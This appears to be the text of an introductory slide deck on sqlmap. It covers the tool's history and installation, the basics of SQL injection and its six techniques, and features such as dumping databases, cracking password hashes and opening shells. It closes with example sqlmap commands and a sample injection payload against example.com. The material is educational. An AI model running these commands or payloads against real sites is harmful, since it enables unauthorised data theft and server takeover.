This ppt is an quick introduction to sqlmap which is a tool used in ethical hacking for detecting and exploiting sql injection flaws and taking over of database servers. This slide covers the history of sqlmap, how it works and important sqlmap queries.
2. An open source
pentesting tool
Mostly used for web
applicaton pentesting
An python based tool
Exploits vulnerabilities
in databases
Supports a wide
range of databases
Comes pre-installed
in kali linux
3. Bernardo Damele
Bernardo took-over the
sqlmap project originally
developed by Daniele
Bellucci, promoted and
presented it at black hat
Europe in 2009.
Miroslav Stampar
Miroslav got a call from the
developers and joined the
project in 2009. Miroslav
and bernando released a
stable version(0.8) of sqlmap
in 2010.
4. In windows : Before installing sqlmap we need to make sure that the system has python installed.
To install python visit the link and follow the steps:
https://www.python.org/downloads/
After installing python download sqlmap from the given link:
https://sqlmap.org/
Follow the steps and instructions from the above link
In kali linux: sqlmap comes pre installed in kali linux. Just start the bash shell and type sqlmap
Ubuntu/other linux distros:
In https://www.ma-no.org/en/security/sqlmap-installation-and-usage-in-ubuntu-and-kali-linux
Follow the steps and instructions from above link
In Mac:
https://macappstore.org/sqlmap/
Follow the steps and instructions from above link
5.
6.
7. MERCURY
Standard programming database
language used for relational
databases
MySQL, Oracle, Sybase, SQL
Server, Postgre are some
examples of relational
databases
DQL,DDL, DML, DCL are some
types of statements used in SQL
Developed by IBM in1970
recognized by ANSI and ISO
8. Ranked in top 10
vulnerabilities by
OWASP
Injects malicious code
in database
Can read, modify,
execute sensitive data
from the server
database
SQL INJECTION
Web
application
vulnerability
9. Hacker Web api server Victim’s Database
http://example.com?user=007 or ‘ 1=1;-- SELECT * FROM users WHERE user=001 or ‘ 1=1;--
Return the database containing all data
Hacker can access all data
10. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, union query-based,
stacked queries and out-of-band.
Boolean-based blind: This technique relies on sending an SQL query to the database. This query forces the application to
return a boolean result(True/False), the content within the HTTP response will change, or remain the same. The result allows
an attacker to decide whether the query used returns true or false, even though no data from the database are recovered.
Time-based blind: In this technique the attacker sends an query to the server to force a delay in the execution of the queries.
The response time indicates whether the result is true or false.
11. Error-based: This technique forces the database to generate an error, giving the attacker information that can be used to
manipulate data in database.
Union-based: This technique allows an attacker to extract information from the database quickly. This attack uses the sql union
operator. This attack allows the attacker to add a row to the existing database on the server.
Stacked queries: In sql a semicolon(;) is used to terminate statements. By deleting the original query and adding new the
attacker can change data in the database. The semicolon allows the attacker to execute multiple statements into the database.
Out-of-band: This technique mostly depends on features being enabled on the database server being used by the web
application. It occurs when an attacker is unable to use the same channel to launch the attack and gather results. This technique
rely on the database server’s ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with
Microsoft SQL Server’s xp_dirtree command, which can be used to make DNS requests to a server an attacker controls as well
as Oracle Database’s UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an
attacker controls.
14. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address,
port and database name.
Entirely, a range of entries or specific columns as per user's choice. The user can
Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
Support to dump database tables also choose to dump only a range of characters from each column's entry.
Support to search for specific database names, specific tables across all databases or specific columns across all databases
tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names
contain string like name and pass.
Support to download and upload any file from the database server underlying file system when the database software is
MySQL, PostgreSQL or Microsoft SQL Server.
15. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system
when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying
operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface
(VNC) session as per user's choice.
Support for database process user privilege escalation via metasploit's meterpreter getsystem command.
16.
17.
18.
19.
20.
21.
22. Basic syntax: sqlmap -u URL/-r FILE --function
Get request: sqlmap -u http://example.com/page.php?id=1
Using file: sqlmap -r request.txt
Testing with pattern of URL’s: sqlmap -u http://example.com/page*/view --dbs
Post request: sqlmap -u http://example.com/login.php --data “username=admin&password=admin&submit=submit” -p
username
Using cookies: sqlmap -u http://example.com /enter.php --cookie=“PHPSESSID=4582s5545gfsg77854”
Database enumaeration: sqlmap -u http://example.com/page.php?id=1 --dbs